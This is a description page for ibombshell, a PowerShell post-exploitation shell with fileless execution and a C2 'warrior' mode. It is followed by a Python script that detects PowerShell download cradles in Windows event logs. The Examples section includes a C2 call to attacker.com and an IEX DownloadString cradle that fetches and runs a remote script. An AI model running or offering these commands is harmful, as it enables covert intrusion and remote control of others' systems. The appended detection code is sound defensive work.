ibombshell
ibombshell is a dynamic remote shell tool written in PowerShell that provides post-exploitation functionalities loaded directly into memory. It offers two execution modes: Everywhere for direct shell access and Silently for C2-controlled warriors.
Description
ibombshell is a PowerShell-based tool designed for penetration testers during post-exploitation phases. It delivers a fully interactive shell with extensive pentesting features that are downloaded and executed directly in memory, avoiding disk writes and the file-based detection that depends on them. The tool's 'Everywhere' execution mode provides immediate command prompt access with exploitation and post-exploitation capabilities available as PowerShell functions.
The tool also features a 'Silently' execution mode where a lightweight instance called 'warrior' connects back to a C2 panel over HTTP. This allows pentesters to remotely control compromised systems and dynamically load additional functions into memory as needed. This memory-only execution technique is particularly useful for maintaining persistence and evading endpoint detection.
ibombshell targets Windows environments through PowerShell execution, making it ideal for red team operations requiring stealthy command and control infrastructure.
How It Works
ibombshell operates through PowerShell execution in memory-only mode (fileless execution). In 'Everywhere' mode, the shell and its functions are downloaded directly to memory as PowerShell functions, providing immediate interactive access. In 'Silently' mode, a minimal 'warrior' instance establishes an HTTP connection to a C2 panel, enabling remote command execution and dynamic function loading into the compromised system's memory without creating persistent artifacts.
Installation
sudo apt install ibombshell
Examples
sudo apt install ibombshell
ibombshell --mode everywhere
ibombshell --mode silently --c2 http://attacker.com
ibombshell --help
ibombshell --mode everywhere --load-functions
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://c2/ibombshell.ps1')"
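The last command in the Examples is a download cradle: remote script text handed straight to Invoke-Expression, which is how the in-memory loading described under How It Works shows up in Windows logs. The following triage sketch is an added example, not part of ibombshell or of the original page; the field names (event_id, host, text), the host names and the sample events are constructed, and it assumes process-creation command lines (Event ID 4688) and PowerShell script block logging (Event ID 4104) are being collected.

```python
import re

# Case-insensitive indicators of a PowerShell in-memory download-and-execute cradle.
INVOKE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD = re.compile(r"\b(?:downloadstring|downloaddata|invoke-webrequest|invoke-restmethod)\b", re.I)
POLICY_BYPASS = re.compile(r"-e(?:p|x\w*)\s+bypass\b", re.I)  # -ep, -exec, -ExecutionPolicy
URL = re.compile(r"https?://[^\s'\"()]+", re.I)

CRADLE = "remote content passed to Invoke-Expression"
BYPASS = "execution policy bypass"
CLEARTEXT = "script fetched over cleartext HTTP"

def inspect(text):
    """Return (reasons, urls) for one script block or command line."""
    reasons = []
    if INVOKE.search(text) and DOWNLOAD.search(text):
        reasons.append(CRADLE)
    if POLICY_BYPASS.search(text):
        reasons.append(BYPASS)
    urls = URL.findall(text)
    if CRADLE in reasons and any(u.lower().startswith("http://") for u in urls):
        reasons.append(CLEARTEXT)
    return reasons, urls

def triage(events):
    """Return findings; a bypass flag alone is common in admin scripts, so it rates low."""
    findings = []
    for ev in events:
        reasons, urls = inspect(ev["text"])
        if reasons:
            findings.append({"event_id": ev["event_id"], "host": ev["host"],
                             "severity": "high" if CRADLE in reasons else "low",
                             "reasons": reasons, "urls": urls})
    return findings

# Constructed sample events: 4688 = process creation, 4104 = script block logging.
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "ws-01",
     "text": "powershell -ep bypass -c \"IEX (New-Object Net.WebClient)"
             ".DownloadString('http://c2/ibombshell.ps1')\""},
    {"event_id": 4104, "host": "ws-01",
     "text": "iex (new-object net.webclient).downloadstring('http://c2/ibombshell.ps1')"},
    {"event_id": 4688, "host": "srv-02",
     "text": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"event_id": 4104, "host": "srv-02", "text": r"Get-ChildItem C:\Logs | Measure-Object"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The script block event (4104) carries the cradle text even when nothing is written to disk, so it is the more reliable of the two sources for this pattern.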